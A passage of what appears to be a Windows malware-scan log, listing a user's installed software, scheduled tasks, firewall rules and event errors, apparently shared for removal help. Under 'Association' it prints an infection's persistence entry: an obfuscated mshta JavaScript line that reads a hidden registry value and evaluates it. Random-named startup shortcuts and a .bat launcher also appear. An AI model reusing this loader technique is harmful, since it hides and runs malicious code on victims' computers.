HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Photosmart Prem C310 All-In-One Driver Software 14.0 Rel. 7 (HKLM\...\{4E484899-4F93-4086-88BA-56BDDF47A776}) (Version: 14.0 - HP)
HP Smart Web Printing 4.60 (HKLM\...\HP Smart Web Printing) (Version: 4.60 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Support Assistant (HKLM-x32\...\{56D27851-B9A6-430F-875A-E2D7A3802C7B}) (Version: 8.3.34.7 - HP Inc.)
HP Support Solutions Framework (HKLM-x32\...\{2B5A1E68-6617-406D-B797-5DAB5B4630B8}) (Version: 12.5.32.37 - HP Inc.)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPAppStudio (x32 Version: 140.0.95.000 - Hewlett-Packard) Hidden
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 140.0.211.000 - Hewlett-Packard) Hidden
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4815.1002 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden
Norton Security (HKLM-x32\...\NS) (Version: 22.8.0.50 - Symantec Corporation)
Norton Utilities 16 (HKLM-x32\...\Norton Utilities 16_is1) (Version: 16.0 - Symantec Corporation)
Office 15 Click-to-Run Extensibility Component (Version: 15.0.4815.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4815.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (Version: 15.0.4815.1002 - Microsoft Corporation) Hidden
PC Probe II (HKLM-x32\...\{F7338FA3-DAB5-49B2-900D-0AFB5760C166}) (Version: 1.04.92 - ASUSTeK Computer Inc.)
Platform (x32 Version: 1.39 - VIA Technologies, Inc.) Hidden
PS_AIO_07_C310_SW_Min (x32 Version: 140.0.304.000 - Hewlett-Packard) Hidden
Pulse Secure Host Checker (HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\PulseSecure_Host_Checker) (Version: 8.1.6.39491 - Pulse Secure, LLC)
Pulse Secure Network Connect 8.1 (HKLM-x32\...\Pulse Secure Network Connect 8.1) (Version: 8.1.6.39491 - Pulse Secure, LLC)
Pulse Secure Setup Client (HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Juniper_Setup_Client) (Version: 8.1.6.61491 - Pulse Secure, LLC)
Pulse Secure Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Pulse Secure, LLC)
Pulse Secure Setup Client Activex Control (HKLM-x32\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Pulse Secure, LLC)
Pulse Secure Terminal Services Client (HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Juniper_Term_Services) (Version: 8.1.6.39491 - Pulse Secure, LLC)
Quicken 2015 (HKLM-x32\...\{00C2D443-43D9-4550-ABEA-318288E23E57}) (Version: 24.1.11.1 - Intuit)
QuickTransfer (x32 Version: 140.0.98.000 - Hewlett-Packard) Hidden
RAIDXpert (HKLM-x32\...\InstallShield_{8B76B8E9-F773-4B75-A08C-120079EB765E}) (Version: 3.2.1540.10 - AMD)
RAIDXpert (x32 Version: 3.2.1540.10 - AMD) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 1.00.0000 - Realtek)
Scan (x32 Version: 140.0.80.000 - Hewlett-Packard) Hidden
ScottradeELITE v5 (HKLM-x32\...\{7E94DCE4-F1F3-47AF-A2D4-8A81008D9B1F}) (Version: 5.3.0.0 - Scottrade Inc.)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
Silhouette Studio (HKLM-x32\...\{27786390-C9DC-4C31-8F1A-4EFD9C833BC9}) (Version: 3.8.064 - Silhouette America)
SmartWebPrinting (x32 Version: 140.0.186.000 - Hewlett-Packard) Hidden
Soda PDF Desktop (HKLM-x32\...\SodaDesktop) (Version: 9.0.7.29594 - LULU Software Limited)
Soda PDF Desktop Asian Fonts Pack (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Convert Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Create Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Edit Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Forms Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Insert Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop OCR Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Review Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Secure Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop View Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
SolutionCenter (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden
Status (x32 Version: 140.0.256.000 - Hewlett-Packard) Hidden
Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Turbo Key (HKLM-x32\...\{B83F7FA5-3191-4E39-A1F2-8A9038BD0B04}) (Version: 1.01.03 - )
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.39 - VIA Technologies, Inc.)
WebReg (x32 Version: 140.0.212.017 - Hewlett-Packard) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5102\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0A8ABF0E-E42C-4A0A-962A-9EA42D0D0A0D} - System32\Tasks\ASUS\Cpu Level Up Hook Lanunch => C:\Program Files\ASUS\Ai Suite\CpuLevelUpHookLaunch.exe [2009-12-28] ()
Task: {0D778694-01BF-4CB5-957F-2B9D3454B67F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {2CF7C28B-3712-4625-9DD7-5CA676144E8F} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {2D7DE540-11EB-46A2-82BB-03C33C6D95A4} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {2DC7CF09-A6E9-4BF9-A1EB-B78568EA4F05} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-08-23] (HP Inc.)
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {361D8EA9-FCB7-41F0-94DF-9ED53E391D8E} - System32\Tasks\NUSchedule => C:\Program Files (x86)\Symantec\Norton Utilities 16\nu.exe [2016-01-24] (Symantec)
Task: {3D542F19-0046-496E-9253-C65238E285FA} - System32\Tasks\NUAutoUpdate => C:\Program Files (x86)\Symantec\Norton Utilities 16\SULauncher.exe [2016-01-24] (Symantec)
Task: {4067A9DA-13AE-4BD6-8872-8E6BC4B6F66A} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe [2016-09-23] (Symantec Corporation)
Task: {4314D44A-9BE6-4BA1-8A2C-E49854D01397} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-07-04] (HP Inc.)
Task: {4FDE0F52-8FB9-4FEE-8A9D-27C8ED6CB82C} - System32\Tasks\GoogleUpdateTaskMachineCore1d1e916bc7e32e3 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.)
Task: {542BBF22-4CCC-45E0-9F13-72D5CC6F8545} - System32\Tasks\ASUS\ASUS RegRun Loader => C:\ProgramData\ASUS\AASP\1.02.00\AsLoader.exe [2010-01-13] (ASUSTeK Computer Inc.)
Task: {5D077E02-9C97-43EC-819A-06407E5CA12E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.)
Task: {7164736C-C125-4F9F-9359-85360B9F6451} - System32\Tasks\GoogleUpdateTaskMachineUA1d1e916bd037ff2 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.)
Task: {7E664410-0BA7-4734-8CB0-1DC19EF18AC0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-2722837513-1420934957-2528714982-1000
Task: {8D46F707-D87A-4830-98D3-F02EE1268E92} - System32\Tasks\G2MUpdateTask-S-1-5-21-2722837513-1420934957-2528714982-1000 => C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5808\g2mupdate.exe [2016-11-01] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {93188D78-690F-4D0C-883C-D3A8B7FAABAC} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {95EED91D-3005-44BC-894C-5E5417D3F325} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {998CDE86-63FB-49DC-B4B1-85B8A4C06407} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\WSCStub.exe [2016-09-23] (Symantec Corporation)
Task: {9B27BD5D-408F-40E5-8086-D465A8BF28BD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-08-03] (HP Inc.)
Task: {A6C222F7-59DE-473B-8653-21BE31C82342} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.)
Task: {ABCB583D-6D26-4C50-86F4-F42969578D1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-08-23] (HP Inc.)
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {B95977B7-556A-4DA7-8C17-15E62B9ABF92} - System32\Tasks\G2MUploadTask-S-1-5-21-2722837513-1420934957-2528714982-1000 => C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5808\g2mupload.exe [2016-11-01] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {B996CB78-9FF5-4EBF-9A46-EE6618B9EACE} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-10-12] (HP Inc.)
Task: {CCF8BA5C-781A-4C01-B2A5-DDC43FE33697} - System32\Tasks\ASUS\ASUS Update Checker => C:\Program Files (x86)\ASUS\ASUSUpdate\UpdateChecker\UpdateChecker.exe [2009-12-28] (ASUSTeK Computer Inc.)
Task: {CE47B63F-F75A-44CC-9F2E-2A7B288F1218} - System32\Tasks\HPCeeScheduleForDale => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-05-12] (HP Development Company, L.P.)
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
Task: {D6A998B1-BFA6-4F98-AA41-BACD70A20181} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-18] (Adobe Systems Incorporated)
Task: {D6F0E5CE-193B-43A8-84A7-914A643873C2} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-08-18] (HP Inc.)
Task: {E1E98814-717E-41EC-83F7-10F7AA59CED3} - System32\Tasks\ASUS\ASUS SIX Engine => C:\Program Files (x86)\ASUS\EPU-4 Engine\FourEngine.exe [2012-01-03] (ASUSTek Computer Inc.)
Task: {E53E44FB-9B83-426E-A9FB-B394E57995A5} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {EEED5911-B058-4303-884F-C7F3FC4439E0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-01-17] (Microsoft Corporation)
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
Task: {FAF047D5-15AD-4C73-BA60-FB1CAA91CADA} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-01-17] (Microsoft Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2722837513-1420934957-2528714982-1000.job => C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5808\g2mupdate.exe
Task: C:\Windows\Tasks\G2MUploadTask-S-1-5-21-2722837513-1420934957-2528714982-1000.job => C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5808\g2mupload.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d1e916bc7e32e3.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d1e916bd037ff2.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForDale.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\NUAutoUpdate.job => C:\Program Files (x86)\Symantec\Norton Utilities 16\SULauncher.exe
Task: C:\Windows\Tasks\NUSchedule.job => C:\Program Files (x86)\Symantec\Norton Utilities 16\nu.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Dale\AppData\Local\e2f44a7\015e8c8.lnk -> C:\Users\Dale\AppData\Local\e2f44a7\02ab8e0.bat ()
 
==================== Loaded Modules (Whitelisted) ==============
 
2016-01-17 17:24 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2016-01-17 17:25 - 2016-01-17 17:37 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll
2016-02-22 19:19 - 2016-02-22 19:19 - 00402624 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream64.dll
2016-01-17 17:24 - 2016-01-17 17:34 - 02210480 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\tmpod.dll
2016-02-22 19:20 - 2016-04-19 17:01 - 01437888 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\ADDINS\UmOutlookAddin.dll
2016-01-17 17:37 - 2016-01-17 17:37 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2016-11-01 16:32 - 2016-10-30 23:29 - 01819240 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.87\libglesv2.dll
2016-11-01 16:32 - 2016-10-30 23:29 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.87\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:792D4CF1 [169]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Classes\3e97b17: "C:\Windows\system32\mshta.exe" "javascript:b5dsr0N="j7b";Q80T=new ActiveXObject("WScript.Shell");APdJ5x9="j";G8WHH=Q80T.RegRead("HKCU\\software\\qwgcellmqw\\wgis");kmh2VOPj="aKOOEp";eval(G8WHH);l4KSR8="JdLe8SE";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 20:34 - 2016-11-01 20:03 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Dale\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: AMD_RAIDXpert => 2
MSCONFIG\Services: AsSysCtrlService => 2
MSCONFIG\Services: DiskDoctorService => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HPSupportSolutionsFrameworkService => 2
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: NU16StartManagerSvc => 2
MSCONFIG\Services: SpeedDiskService => 3
MSCONFIG\Services: VIAKaraokeService => 2
MSCONFIG\startupfolder: C:^Users^Dale^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^d159507.lnk => C:\Windows\pss\d159507.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Dale^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^e84c097.lnk => C:\Windows\pss\e84c097.lnk.Startup
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{93BFFD82-9955-4F06-B1A7-8935942D3A7E}] => (Allow) C:\Users\Dale\AppData\Local\Temp\7zS7CB1\setup\hpznui40.exe
FirewallRules: [{AE082788-E606-4815-B2A1-6E4943400245}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{A32A69C5-5173-4FB1-BBD2-21CFC40726A3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{F6A779F8-3F2D-471D-9DDE-71E0F3A790DF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{8BB6927D-5C26-4E06-A43F-8C0B3C6482EE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{04512FAC-55BD-4FB8-9572-461364226DF7}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{A3C44D59-8E17-47FF-A075-F32724B32101}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{9743D652-77AE-4E89-AF2C-A7F882B45222}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{6959B2BC-2789-45E0-BBE0-D4C5C95698CF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{3639F8D0-B5BD-4A9A-8F9A-3E332F15BD0D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{4BB40614-98EF-4A3B-8781-0EDFA72186B1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{CEF1670D-AFC8-41F0-81AA-D4F957EE1506}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{F527E2F8-F637-4001-ADF2-C8E0369275D6}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{17E3693C-AA60-462B-89F6-379D277535D8}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{11328349-5016-4752-BB47-B42252BEFD8B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{81BCDCEA-207E-4599-92E1-20621624DFB1}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{4B3615B3-308C-4046-BA12-E410F7C97CEE}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{D1EA94DC-0EB7-4CE0-8493-435C863197B9}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{471F1CAD-E700-40DB-B9C9-66404FE6DDC2}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{EEA7B41B-0E0C-4DCA-8344-F848EB7B982B}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{924BD75E-30E3-45F9-9D10-A8371971E210}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{B92101A7-AF6D-4E8C-B3FF-DE51E65BFD57}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{3143D345-6826-4F2B-9F82-BCB7D4E00604}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{D7AF3D0D-1CBF-44BA-811E-0D707B3714C6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{9648780A-319E-4F53-B6E5-5BCF84E3AAB5}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{6A2824C6-31FD-48F9-94B8-0F4D466F3AD5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
05-11-2016 18:00:11 Windows Update
08-11-2016 17:43:02 Removed Adobe Acrobat Reader DC.
08-11-2016 17:51:51 Restore Operation
08-11-2016 17:57:17 Removed Adobe Acrobat Reader DC.
08-11-2016 18:07:05 Installed Soda PDF Desktop View Module
08-11-2016 18:08:41 Installed Soda PDF Desktop Create Module
08-11-2016 18:09:38 Installed Soda PDF Desktop Forms Module
08-11-2016 18:10:04 Installed Soda PDF Desktop Secure Module
08-11-2016 18:10:45 Installed Soda PDF Desktop Edit Module
08-11-2016 18:11:18 Installed Soda PDF Desktop Review Module
08-11-2016 18:12:02 Installed Soda PDF Desktop Insert Module
08-11-2016 18:12:37 Installed Soda PDF Desktop Asian Fonts Pack
08-11-2016 18:13:21 Installed Soda PDF Desktop Convert Module
08-11-2016 18:14:42 Installed Soda PDF Desktop OCR Module
08-11-2016 18:17:08 Windows Update
 
==================== Faulty Device Manager Devices =============
 
Name: Photosmart Prem C310 series
Description: Photosmart Prem C310 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/12/2016 03:43:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.18523, time stamp: 0x2a425e19
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0x00000000
Fault offset: 0x00000000
Faulting process id: 0x1b70
Faulting application start time: 0x01d23d2d4a4b06b9
Faulting application path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Faulting module path: unknown
Report Id: 07964637-a921-11e6-95c8-382c4abaa96d
 
Error: (11/12/2016 07:35:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: ole32.dll, version: 6.1.7601.23392, time stamp: 0x56eb3627
Exception code: 0xc0000005
Fault offset: 0x000000000002931b
Faulting process id: 0xbd0
Faulting application start time: 0x01d23ce82d96a68d
